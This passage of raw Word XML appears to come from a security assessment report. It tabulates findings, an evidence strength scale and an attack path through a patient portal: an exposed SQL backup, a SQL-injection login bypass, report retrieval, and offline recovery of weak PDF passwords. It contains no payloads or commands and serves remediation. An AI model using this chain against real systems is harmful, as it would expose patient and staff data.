            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Browser-confirmed portal access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqlmap did not independently confirm because of 403/connection instability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Captured SQL syntax warning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQLi request/response evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exact unseen source code is not claimed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Three HTTP 200 PDF responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portal screenshots and download links</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Standalone cross-patient IDOR not tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sequential report identifiers and exposed reports/ path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>403 response for direct reports directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No arbitrary file-read claim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory listing showing error_log metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Related patient directory screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Log contents not claimed readable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP/service fingerprints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Nmap service scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No banner-specific exploit established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Evidence strength scale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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use in this report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>E3 — Direct exploit proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Controlled input causes a reproducible security-state change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>E2 — Direct exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unauthenticated request returns sensitive artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>E1 — Corroborating evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Screenshots/HTML reinforce a directly observed behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-01/F-05/F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>E0 — Contextual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Technology or configuration observation without exploit proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>8. Attack-Path Graph &amp; Trust Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The compromise can be understood as a sequence of trust-boundary crossings. The attacker begins outside the application and should be stopped at multiple independent boundaries. Instead, several boundaries fail in sequence.</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expected control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Consequence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Internet → web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive files denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory indexing exposed application artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Web root → backup data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Backups outside public root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQL backup directly downloadable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HR/shareholder disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>User input → SQL engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Parameterized query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Controlled input changes authentication behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Auth bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Session → patient portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Valid authenticated session required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portal reached after SQLi state change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient function access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Session → report object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Server-side ownership check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Three report objects returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient-report retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Retrieved PDF → document content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Strong document protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Legacy PDF protection + weak passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Offline recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This model is useful for remediation because it shows why fixing only one symptom may leave another path open. Removing the SQL backup does not fix SQL injection; fixing SQL injection does not remove the exposed backup. The controls must be corrected independently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>9. Bounty-Grade Reproducibility Standard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The project is written to the evidence standard expected from a high-quality vulnerability submission: a reviewer should be able to reproduce the important behavior without trusting an assertion. The standard used here is deliberately stricter than “scanner found it.”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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Implementation in this project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Clear scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
